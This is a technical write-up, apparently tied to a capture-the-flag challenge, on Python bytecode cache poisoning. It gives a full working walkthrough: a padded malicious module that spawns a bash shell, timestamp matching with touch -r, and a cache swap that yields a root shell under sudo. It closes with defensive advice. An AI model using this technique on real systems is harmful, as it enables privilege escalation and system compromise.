Python cache poisoning is mechanically simple, and exploitable under specific — and unfortunately still common — misconfigurations. In certain situations, as shown by a recent HackTheBox challenge (which shall remain unnamed), it can be used to elevate a malicious user's privileges and compromise a system. But first let's understand why python has a bytecode caching mechanism.
Python Objects
When you run a python script, the interpreter will compile all modules you import (i.e. not the script itself) and store the resulting bytecode in a __pycache__ folder located alongside the module source code. When you run the script again, the interpreter will load the bytecode directly, from the cache, if nothing has changed.
This mechanism allows the interpreter to skip the .py file parsing and speeds up the overall execution. For a more detailed description of what the python bytecode looks like and python execution internals, you can check this article on opensource.com.
Let's consider this very simple example. The pyc_poison.py file is the main script that calls some functions from pyc_mod:
import pyc_mod as mod
def main():
print("Hello World!")
print(mod.sum_square(2, 3))
print(mod.square(2))
if __name__ == "__main__":
main()The pyc_mod.py file defines the two square and sum_square functions:
# (not so) complex module that provides helper functions
# for squaring and summing squares of integers
# return the sum of the squares of two integers
def sum_square(a: int, b: int) -> int:
return a * a + b * b
def square(a: int) -> int:
return a * aLet's see what happens when the pyc_poison.py script is run:
% python3 pyc_poison.py
Hello World!
13
4
% ls __pycache__
pyc_mod.cpython-314.pyc
% stat -x -t %s pyc_mod.py
File: "pyc_mod.py"
Size: 248 FileType: Regular File
Mode: (0644/-rw-r--r--) Uid: ( 501/bigfatfrodo) Gid: ( 20/ staff)
Device: 1,14 Inode: 51659942 Links: 1
Access: 1769005410
Modify: 1769005409
Change: 1769005409
Birth: 1769002236If we peek inside, we can see the following:
% xxd __pycache__/pyc_mod.cpython-314.pyc | head -4
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
00000010: e300 0000 0000 0000 0000 0000 0002 0000 ................
00000020: 0000 0000 00f3 1e00 0000 8000 5200 1700 ............R...
00000030: 5201 1700 6c10 7400 5202 1700 5203 1700 R...l.t.R...R...
.....The Object Format
In preparation of our cache poisoning, we need to understand the format of the object file. The object file has a 16-byte header as follows:
- bytes
0-3: magic number identifying the python version. - bytes
4-7: a bit field;0for timestamp-based,1hash-based unchecked,3hash-based checked. - bytes
8-11: source modified timestamp (as returned bystat) OR hash (depending on bit field) - bytes
12-15: source file size - bytes
16+: marshalled object code
Quick reality check for our file:
- magic number
0x2b 0x0e 0x0d 0x0a, identifying python 3.14.2 - our source file size is 248 bytes, or
0xf8 - timestamp-based check, since the bit field is 0. Modify timestamp for the source is 1769005409, which matches
0x6970e161(in little endian order) in the header.
If any of these do not match — python version, source file size — or if the source is newer than the cached file, the cache file is discarded and the code is recompiled.
Cache Poisoning
Now, these checks don't make it very difficult for a malicious actor to create a custom, compiled object that would, for instance, give him a shell. Combined with other security faults, like allowing a regular user to run python as root and allowing world-write access to the cache folder, this could result in a privilege escalation.
In our example, let's craft a pyc_malicious.py file with the purpose of replacing the compiled pyc_mod object with a new one that, when calling sum_square from pyc_poison.py, we will be dropped into a shell:
import pty
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12
# return the sum of the squares of two integers
def sum_square(a, b: int) -> int:
pty.spawn('/bin/bash')
def square(a: int) -> int:
return a * aThe size of this file must be exactly 248 bytes — hence the padding comments. The sum_square function is replaced with the shell spawn. The other function is unchanged.
This file can be compiled directly by running python3 -m py_compile pyc_malicious.py, and the result will also be placed in the __pycache__ folder.
% ls __pycache__/
pyc_malicious.cpython-314.pyc pyc_mod.cpython-314.pycNow, in the cache folder we have the original pyc_mod object file, as well as the new one. Note that I used the same python version to generate the pyc_malicious object file.
Let's compare the two files now:
% xxd __pycache__/pyc_mod.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
%
% xxd __pycache__/pyc_malicious.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 fd07 7a69 f800 0000 +.........zi....
The magic number, the bit field and the size field match. The only thing remaining is to make the timestamp fields match as well. We can do that with touch
% touch -r pyc_mod.py pyc_malicious.py
% stat -x -t %s pyc_malicious.py
File: "pyc_malicious.py"
Size: 248 FileType: Regular File
Mode: (0644/-rw-r--r--) Uid: ( 501/bigfatfrodo) Gid: ( 20/ staff)
Device: 1,14 Inode: 52358264 Links: 1
Access: 1769605821
Modify: 1769005409
Change: 1769605820
Birth: 1769005409touch -r uses a reference file and updates the modified timestamp on the target file to match this reference. That's exactly what we need.
If we compile again and check headers:
% python3 -m py_compile pyc_malicious.py
% xxd __pycache__/pyc_mod.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
% xxd __pycache__/pyc_malicious.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....Now there is a perfect match between the headers of the two files. We can copy the second over the first and run the pyc_poison.py script as before to get a shell:
% mv __pycache__/pyc_malicious.cpython-314.pyc __pycache__/pyc_mod.cpython-314.pyc
% ls __pycache__
pyc_mod.cpython-314.pyc
% python3 pyc_poison.py
Hello World!
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$Or, if the user is allowed to run python with sudo, to get a #root shell:
% sudo python3 pyc_poison.py
Hello World!
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2#Things to Take Away
- To sum up, what we did was to replace a compiled bytecode object in the
__pycache__folder so that, without changing the code in the main script file, we can execute arbitrary code. This is "useful" when you can't change the script files, but the cache folder is writable. - Even if PEP-552 introduces source files hashes into the
pycobject header, this does not happen when these objects are generated just by simply running a script that imports other modules. And this is intentional, as all this hashing computations and checks would impact performance. - Python cache poisoning is another reason (among thousands) for which care should be taken when configuring which users can run what applications and with what privileges. And when deciding that a folder should be writable or not.
- After all,
__pycache__is a cache, and not a security feature. Its purpose is to speed up things. .pycfiles can be omitted completely, by using the-Bargument topythonor thePYTHONDONTWRITEBYTECODEenvironment variable.